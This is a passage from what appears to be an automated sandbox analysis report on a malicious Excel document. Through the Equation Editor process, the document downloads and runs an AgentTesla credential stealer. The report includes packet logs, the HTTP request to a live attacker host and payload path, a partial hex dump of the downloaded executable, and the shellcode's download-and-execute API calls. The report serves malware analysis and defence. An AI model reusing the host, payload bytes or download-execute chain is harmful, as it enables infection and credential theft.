Aug 8, 2022 17:26:51.842264891 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842266083 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842281103 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842289925 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842305899 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842308044 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842320919 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842324018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842336893 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842339993 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842353106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842360020 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842369080 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842375040 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842386007 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842391968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842401028 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842408895 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842417002 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842426062 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842432976 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842441082 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842447996 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842459917 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842463970 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842479944 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842483044 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842499018 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842503071 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842514038 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842515945 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842530966 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.842536926 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842556000 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.842571974 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.893412113 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:56.421506882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:56.421628952 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:57.027848959 CEST	49179	80	192.168.2.22	198.12.89.152

HTTP Request Dependency Graph

198.12.89.152

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49179	198.12.89.152	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2022 17:26:50.796442986 CEST	0	OUT	GET /mon/mon.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.89.152 Connection: Keep-Alive
Aug 8, 2022 17:26:50.915329933 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 08 Aug 2022 15:26:50 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19 Last-Modified: Mon, 08 Aug 2022 13:26:41 GMT ETag: "dae00-5e5bac4276722" Accept-Ranges: bytes Content-Length: 896512 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d 0f f1 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a6 0d 00 00 06 00 00 00 00 00 00 2e c5 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0d 00 53 00 00 00 00 e0 0d 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a5 0d 00 00 20 00 00 00 a6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 e0 0d 00 00 04 00 00 00 a8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 ac 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c5 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 d2 0c 00 d0 f2 00 00 03 00 00 00 b7 00 00 06 28 b0 00 00 e0 21 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 07 00 d8 00 00 00 01 00 00 11 02 19 8d 4b 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 4b 00 00 70 a2 25 18 72 59 00 00 70 a2 7d 02 00 00 04 02 14 7d 03 00 00 04 02 28 16 00 00 0a 20 03 6d 2f 17 20 e3 d6 7e 66 61 25 0a 1c 5e 45 06 00 00 00 19 00 00 00 35 00 00 00 02 00 00 00 64 00 00 00 d4 ff ff ff 45 00 00 00 2b 62 00 00 02 28 13 00 00 06 06 20 7e a4 05 de 5a 20 b0 66 13 3d 61 2b c0 02 7b 0f 00 00 04 1b 28 19 00 00 06 00 06 20 90 2c 64 b5 5a 20 cc df a4 7b 61 2b a4 00 06 20 99 ca 63 a7 5a 20 26 cf 38 56 61 2b 94 00 02 7b 19 00 00 04 1b 28 19 00 00 06 06 20 aa 93 e2 7a 5a 20 10 37 37 e8 61 38 75 ff ff ff 7e 04 00 00 04 74 03 00 00 01 02 7b 02 00 00 04 28 1a 00 00 06 26 2a 13 30 03 00 3a 00 00 00 01 00 00 11 00 20 92 ef 9c 68 20 91 b6 de 3e 61 25 0a 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 17 00 00 00 2b 15 02 28 08 00 00 06 06 20 36 3b d9 f4 5a 20 51 62 bd 9d 61 2b ce 00 2a 00 00 13 30 02 00 02 00 00 00 01 00 00 11 00 2a 00 00 1b 30 05 00 ca 03 00 00 02 00 00 11 00 14 0a 14 0b 00 02 7b 06 00 00 04 28 1b 00 00 06 16 28 1c 00 00 06 0c 20 93 ed 15 05 20 f9 72 47 0a 61 25 13 09 1f 17 5e 45 17 00 00 00 11 01 00 00 05 00 00 00 86 01 00 00 76 02 00 00 55 00 00 00 89 00 00 00 8e ff Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb0. @ @S H.text4 `.rsrc@@.reloc@BH(!00K%rp%rKp%rYp}}( m/ ~fa%^E5dE+b( ~Z f=a+{( ,dZ {a+ cZ &8Va+{( zZ 77a8u~t{(&0: h >a%^E+( 6;Z Qba+00{(( rGa%^EvU
Aug 8, 2022 17:26:50.915393114 CEST	3	IN	Data Raw: ff ff 16 02 00 00 c2 00 00 00 75 00 00 00 5a 01 00 00 ae 01 00 00 2a 02 00 00 4f 02 00 00 d6 00 00 00 94 00 00 00 f7 02 00 00 99 02 00 00 65 01 00 00 e9 01 00 00 d3 01 00 00 02 02 00 00 62 02 00 00 38 f2 02 00 00 73 41 01 00 06 0d 08 28 1d 00 00 Data Ascii: uZ*Oeb8sA(((( o9o, ]%+ mt%& Za8>ooi(% N-~8 WZ l/a8 28{(#($rqp('
Aug 8, 2022 17:26:50.915414095 CEST	4	IN	Data Raw: 61 2b d1 11 05 28 31 00 00 06 28 32 00 00 06 26 00 de 00 2a 00 00 41 1c 00 00 00 00 00 00 01 00 00 00 5a 01 00 00 5b 01 00 00 46 00 00 00 1e 00 00 01 13 30 05 00 c8 02 00 00 04 00 00 11 00 20 e1 d0 cc 7a 20 ca 8a 00 63 61 25 13 05 1f 15 5e 45 15 Data Ascii: a+(1(2&*AZ[F0 z ca%^EHS4\H/.y8W kZ Qa+X OZ ?Ra8mi2 At%+ F%&8S
Aug 8, 2022 17:26:50.915431976 CEST	5	IN	Data Raw: 20 be 6a f1 ef 25 26 11 0a 20 97 f5 51 92 5a 61 38 38 ff ff ff 11 04 6f 63 01 00 06 28 2a 00 00 06 0c 11 0a 20 42 d4 76 dd 5a 20 43 57 3e b9 61 38 18 ff ff ff 08 28 1d 00 00 06 11 04 6f 61 01 00 06 13 05 12 05 28 23 00 00 0a 28 2d 00 00 06 26 08 Data Ascii: j%& QZa88oc(* BvZ CW>a8(oa(#(-&(oe(-& >Z a8r'p(? O=WZ (a8 lRZ a8($- b3]%+ %&8og WBZ a8fok(>
Aug 8, 2022 17:26:50.915451050 CEST	7	IN	Data Raw: 20 2a b7 a7 71 61 2b 9c 00 20 ee 22 fd 75 2b 94 00 20 c1 f9 a6 63 2b 8c 06 2c 08 20 74 12 39 f3 25 2b 06 20 6a 9f 7d af 25 26 11 06 20 74 5c fe c1 5a 61 38 6c ff ff ff 09 6f 27 00 00 0a 13 04 11 06 20 ed be 5b 09 5a 20 b5 42 4b c6 61 38 51 ff ff Data Ascii: *qa+ "u+ c+, t9%+ j}%& t\Za8lo' [Z BKa8Qrgpo((#(C(2&( Pj$Z @7PRa8 Z Sk)a8rpo)(+op(<(Co)(+op(<(D& \Z oa8
Aug 8, 2022 17:26:50.915467024 CEST	8	IN	Data Raw: c9 01 00 00 a2 03 00 00 9c 01 00 00 89 07 00 00 8c 06 00 00 b3 09 00 00 c5 14 00 00 21 0a 00 00 97 0a 00 00 44 05 00 00 10 02 00 00 21 0e 00 00 33 16 00 00 b7 10 00 00 ed 13 00 00 0b 16 00 00 80 05 00 00 4a 17 00 00 d4 10 00 00 d0 0b 00 00 56 0d Data Ascii: !D!3JVhy\|_2\Lvj$797Z-u
Aug 8, 2022 17:26:50.915483952 CEST	10	IN	Data Raw: 20 0e 33 e7 40 61 38 18 f9 ff ff 02 7b 06 00 00 04 02 fe 06 0b 00 00 06 73 2c 00 00 0a 28 5f 00 00 06 07 20 b5 ae bb c5 5a 20 61 5c 40 b1 61 38 ef f8 ff ff 00 02 7b 1a 00 00 04 28 7c 00 00 06 02 7b 19 00 00 04 28 7d 00 00 06 00 07 20 fe 92 ba be Data Ascii: 3@a8{s,(_ Z a\@a8{(\|{(} Z \|a8{(#%{%{(S WIZ ?rMa8{(~ BZ Hia8l{r)p(' Z LBia8I( +\Z ^va80
Aug 8, 2022 17:26:50.915499926 CEST	11	IN	Data Raw: d8 5a 20 8a 85 d4 fc 61 38 dc f3 ff ff 02 7b 17 00 00 04 72 a5 02 00 70 28 63 00 00 06 07 20 c3 5a 2c 74 5a 20 d8 9c eb 4b 61 38 ba f3 ff ff 00 02 7b 14 00 00 04 16 28 59 00 00 06 07 20 89 00 8f fa 5a 20 83 67 8c 14 61 38 9b f3 ff ff 00 07 20 b9 Data Ascii: Z a8{rp(c Z,tZ Ka8{(Y Z ga8 >Z a8( C~Z Qa8n{s+(] /Z Va8E{(j !WZ wIa8& HTZ D^Gza8 dmZ a8{(`
Aug 8, 2022 17:26:50.915514946 CEST	12	IN	Data Raw: 7b 61 38 a8 ee ff ff 02 7b 19 00 00 04 20 70 01 00 00 20 9e 00 00 00 73 2d 00 00 0a 28 58 00 00 06 07 20 35 60 25 5c 5a 20 de 53 4c ec 61 38 7c ee ff ff 02 7b 1b 00 00 04 06 72 9d 03 00 70 28 6e 00 00 06 74 34 00 00 01 28 6f 00 00 06 07 20 da c6 Data Ascii: {a8{ p s-(X 5`%\Z SLa8\|{rp(nt4(o NZ a8O{rp(V n\Z oa8-{(Y %XZ KtUa8{(y"HB(z({&{(y"HB(z({& &Z Y0a8{(
Aug 8, 2022 17:26:50.915529966 CEST	14	IN	Data Raw: 00 06 00 02 7b 12 00 00 04 16 28 85 00 00 06 00 02 7b 16 00 00 04 16 28 85 00 00 06 07 20 fb 9d 45 72 5a 20 bb ae 73 b1 61 38 47 e9 ff ff 00 07 20 ad 63 db b3 5a 20 7c 48 fa 52 61 38 34 e9 ff ff 00 02 7b 17 00 00 04 1f 20 1f 18 73 2d 00 00 0a 28 Data Ascii: {({( ErZ sa8G cZ \|HRa84{ s-(d Z Nza8 EKZ kQa8{rp(' DZ Dza8{(4 $BZ s;a8 1\Z Fa8{(W Z =5a8{
Aug 8, 2022 17:26:51.030044079 CEST	15	IN	Data Raw: 07 30 1a 53 61 38 6a ff ff ff 00 09 28 8f 00 00 06 06 16 06 8e 69 28 90 00 00 06 13 04 11 06 20 ef c0 f3 27 5a 20 49 e5 88 fb 61 38 44 ff ff ff 11 04 02 28 17 00 00 06 28 16 00 00 06 28 91 00 00 06 17 9a 80 04 00 00 04 11 06 20 49 00 22 d8 5a 20 Data Ascii: 0Sa8j(i( 'Z Ia8D((( I"Z N.a8rp(t(( BxZ N)a8(( SaZ 8fa80@ e&S 3qVa%^E+(( :

Target ID:	0
Start time:	17:26:17
Start date:	08/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f450000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	17:26:42
Start date:	08/08/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	17:26:53
Start date:	08/08/2022
Path:	C:\Users\Public\Regasm_svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Regasm_svchost.exe"
Imagebase:	0x1010000
File size:	896512 bytes
MD5 hash:	A6439DBBF3F848EB6F83494C5C75A7A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	17:26:56
Start date:	08/08/2022
Path:	C:\Users\Public\Regasm_svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Regasm_svchost.exe
Imagebase:	0x1010000
File size:	896512 bytes
MD5 hash:	A6439DBBF3F848EB6F83494C5C75A7A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	25.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	69.1%
Total number of Nodes:	110
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 033F0517 Relevance: 6.1, APIs: 4, Instructions: 86
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(033F0509), ref: 033F0517

Part of subcall function 033F0531: URLDownloadToFileW.URLMON(00000000,033F0542,?,00000000,00000000), ref: 033F058A
Part of subcall function 033F0531: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 033F05C8
Part of subcall function 033F0531: ExitProcess.KERNEL32(00000000), ref: 033F05E0

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 45f9f743a6710a863b828979674a1f5c73e868614309cdca0a6401774f7f6780
Instruction ID: a2210658b833cc1a52944bbcbe8eb93204a331fdc29e70219a53dad42337ca8a
Opcode Fuzzy Hash: 45f9f743a6710a863b828979674a1f5c73e868614309cdca0a6401774f7f6780
Instruction Fuzzy Hash: 76219CA280D3C16FDB17D7340DBAB65BF646F63104F9889CEE6CA1A0E3E6985101C757

Uniqueness

Uniqueness Score: -1.00%

Function 033F0491 Relevance: 4.6, APIs: 3, Instructions: 139
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,033F0542,?,00000000,00000000), ref: 033F058A
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 033F05C8
ExitProcess.KERNEL32(00000000), ref: 033F05E0

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: a9666e9200a426e1fce2459c6f1aab9fc2318cdf6070fa26f987fef86b7cf7e9
Instruction ID: e4d115b7ae8ceb88af3b23973f147f9a5d7de1fb0a05dbc3fcd97df78f0f64ad
Opcode Fuzzy Hash: a9666e9200a426e1fce2459c6f1aab9fc2318cdf6070fa26f987fef86b7cf7e9
Instruction Fuzzy Hash: AB41DF9580D7C46FD71BD7384EBA669BF206B23100F8C8ACFD6DA0A1E3D2989205C756

Uniqueness

Uniqueness Score: -1.00%

Function 033F0531 Relevance: 4.6, APIs: 3, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: fdc6103540ddaf2c618a1215e9490b3b501042e9900b53b77f0c562b2ef6c33a
Instruction ID: 1cb8512f475b5c0999603f5aa8d859320c32b64b3d439c9a7bf2178cac4a398b
Opcode Fuzzy Hash: fdc6103540ddaf2c618a1215e9490b3b501042e9900b53b77f0c562b2ef6c33a
Instruction Fuzzy Hash: D62138A680D3C16FDB1797340CBEB65BF605F63104F9889CEE6DA1A4D3E6989101C753

Uniqueness

Uniqueness Score: -1.00%

Function 033F0588 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,033F0542,?,00000000,00000000), ref: 033F058A

Part of subcall function 033F05A1: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 033F05C8
Part of subcall function 033F05A1: ExitProcess.KERNEL32(00000000), ref: 033F05E0

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: ceb1f9dc6ee0659472f32b399559b2464d47e6e4c54f4194f321678c2a95d039
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 62F0E29594D340ADEA19E77C4CDEF6A6E649F81B00FD4088AB3996D0D3D8D489008229

Uniqueness

Uniqueness Score: -1.00%

Function 033F05B6 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 033F05C8

Part of subcall function 033F05DB: ExitProcess.KERNEL32(00000000), ref: 033F05E0

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 9225094142640258435f353f2300b471ec711fc3af4fa51d8a7c26a6a0c18699
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 2501499D9583426CDFBCE27C4CD5FB6AB55DBD1700FCC4857AB98140C3C49881C38629

Uniqueness

Uniqueness Score: -1.00%

Function 033F05A1 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 4cc966d9db0409d27bd638a2165a269982402b9ef770acd0e297cd1f11f3c630
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: CF01496D95C3016CEBBCE33C4CC8FAAAA95DBC1708FD84467F79818083C2888542861D

Uniqueness

Uniqueness Score: -1.00%

Function 033F05DB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 033F05E0

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 033F05E2 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 6c9f7430986643bce0414c4261f0b06e0593bd0f99f2af664217a04c88d549c3
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: CBD05E712015029FC308DB08CA80E13F36AFFD4311B58D264D5044B61AD330E891CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 033F045C Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(033F044A), ref: 033F045C

Memory Dump Source

Source File: 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Offset: 033F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_33f0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5ed40e9bf0f7d79d0d9ffdd0bc35cbec13701735349d157eb4c94a567bc2d555
Instruction ID: d3989a4f42aa46682ca4e1ae20c49a9877a3a1e646ddf91a32e1fe9feeb71752
Opcode Fuzzy Hash: 5ed40e9bf0f7d79d0d9ffdd0bc35cbec13701735349d157eb4c94a567bc2d555
Instruction Fuzzy Hash: 8421F299C0EBC05FD71AD3784EE9068BF207A130007DC86CFC6D94E1A3E2989A4AD756

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Regasm_svchost.exePID: 2884, Parent PID: 1160COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	144
Total number of Limit Nodes:	3

Executed Functions

Function 00A40048 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 00A4051A

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
